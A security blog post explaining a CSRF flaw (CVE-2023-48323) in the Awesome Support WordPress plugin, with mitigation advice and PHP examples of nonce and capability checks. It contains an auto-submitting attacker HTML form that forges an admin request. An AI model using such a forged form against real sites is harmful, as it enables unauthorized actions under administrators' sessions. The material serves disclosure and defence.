In late 2023, a security flaw was found in the popular WordPress plugin, Awesome Support – WordPress HelpDesk & Support Plugin. Labeled CVE-2023-48323, this vulnerability allows hackers to perform Cross-Site Request Forgery (CSRF) attacks, potentially letting malicious users manipulate help desk settings or perform unwanted actions on behalf of logged-in administrators. This post explains the vulnerability in simple terms, provides a code snippet example, links to key references, and details how an attacker could exploit this issue.

What is CSRF?

Cross-Site Request Forgery (CSRF) is a web security vulnerability that tricks logged-in users into submitting unwanted actions to a web application. If a user is authenticated, an attacker can get them to perform bad actions—like changing support settings or adding tickets—just by visiting a rogue website or clicking a malicious link.

To put it simply, CSRF takes advantage of the website trusting that the user is actually making the request, when in reality, it could be a hacker on another site making those requests.

Versions: Unknown start version up to (and including) 6.1.4

> If you use this plugin, upgrade to a version newer than 6.1.4 as soon as possible!

Technical Explanation

The vulnerability lies in the fact that some admin actions in the plugin did not check for a CSRF protection token (nonce). This means that if an admin user visited a malicious website while logged in to their WordPress dashboard, the attacker could send forged requests to the plugin.

Exploit Example

Let’s say the plugin lets admins add a canned response without checking for a WordPress nonce. Here’s a simple HTML page (hosted by an attacker) that exploits this:

```html
<html>
  <body>
    <!-- The form posts to the (hypothetical) unprotected admin action; no nonce is included -->
    <form action="https://example.com/wp-admin/admin.php?page=wpas-canned-responses&action=add" method="POST">
      <input type="hidden" name="title" value="Hacked!" />
      <input type="hidden" name="content" value="You have been CSRF'd!" />
      <input type="submit" value="Click me!" />
    </form>
    <script>
      // Auto-submit the form when the page loads (forms[0] is the first form on the page)
      document.forms[0].submit();
    </script>
  </body>
</html>
```

How it works:
- If an admin user visits this page while logged into their WordPress dashboard, the browser automatically submits the form; the request carries the admin's session cookie, so the plugin treats it as a legitimate action by that admin.

All of this could happen without the admin knowing, just by visiting a malicious site, clicking a dodgy link, or opening a malicious email!

Fix & Mitigation

Fixed in version: _A version after 6.1.4 (see the fix description below)_

The proper fix is to implement WordPress nonces (special tokens) for all form actions and verify them server-side before processing changes.
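To show what that looks like in practice, here is an added example (not code from the plugin or from this post) of a WordPress admin handler for the canned-response scenario above, first without protection and then with a nonce and capability check. The function names, the nonce action string and the `wpas_example_response` post type are invented; the WordPress functions used are real.

```php
<?php
// Added example, not the plugin's code. Handler names, the nonce action string
// and the 'wpas_example_response' post type are invented; wp_nonce_field,
// check_admin_referer, current_user_can and admin_post_{action} are real WP APIs.

// Vulnerable pattern: the request is trusted because the admin's cookie is valid.
function wpas_example_add_response_unsafe() {
    wp_insert_post( array(                       // no nonce, no capability check
        'post_type'    => 'wpas_example_response',
        'post_title'   => sanitize_text_field( wp_unslash( $_POST['title'] ?? '' ) ),
        'post_content' => wp_kses_post( wp_unslash( $_POST['content'] ?? '' ) ),
        'post_status'  => 'publish',
    ) );
}

// Hardened pattern, step 1: emit a nonce bound to this specific action.
function wpas_example_render_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="wpas_example_add_response" />
        <?php wp_nonce_field( 'wpas_example_add_response', 'wpas_example_nonce' ); ?>
        <input type="text" name="title" />
        <textarea name="content"></textarea>
        <?php submit_button( 'Add response' ); ?>
    </form>
    <?php
}

// Step 2: verify the nonce, then the capability, before touching any data.
function wpas_example_add_response_safe() {
    // A forged cross-site POST cannot carry a valid nonce, because the attacker's
    // page never sees the token; check_admin_referer() stops the request with
    // "The link you followed has expired." instead of executing it.
    check_admin_referer( 'wpas_example_add_response', 'wpas_example_nonce' );

    // A nonce proves intent, not authorization: still enforce the capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    wp_insert_post( array(
        'post_type'    => 'wpas_example_response',
        'post_title'   => sanitize_text_field( wp_unslash( $_POST['title'] ?? '' ) ),
        'post_content' => wp_kses_post( wp_unslash( $_POST['content'] ?? '' ) ),
        'post_status'  => 'publish',
    ) );
    wp_safe_redirect( wp_get_referer() ?: admin_url() );
    exit;
}
add_action( 'admin_post_wpas_example_add_response', 'wpas_example_add_response_safe' );
```

The same check applies to AJAX handlers (`check_ajax_referer()`) and to REST routes, where a `permission_callback` plays the capability-check role; the CSRF page from the exploit section fails at `check_admin_referer()` because it cannot supply the token.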

References

- Wordfence Advisory - CSRF in Awesome Support
- CVE-2023-48323 on CVE.org
- Plugin homepage on WordPress.org
- OWASP: CSRF Explained

Always update your plugins and stay aware of security advisories.

If you’re a site owner using Awesome Support, patch now and protect your users and their tickets!


> Stay safe, stay updated, and if you manage a WordPress site, always keep back-ups of plugins and your data!


*This article was written exclusively for security-focused site owners and WordPress admins. Please spread the word and help keep the web secure.*

Timeline

Published on: 11/30/2023 13:15:09 UTC
Last modified on: 12/05/2023 02:00:16 UTC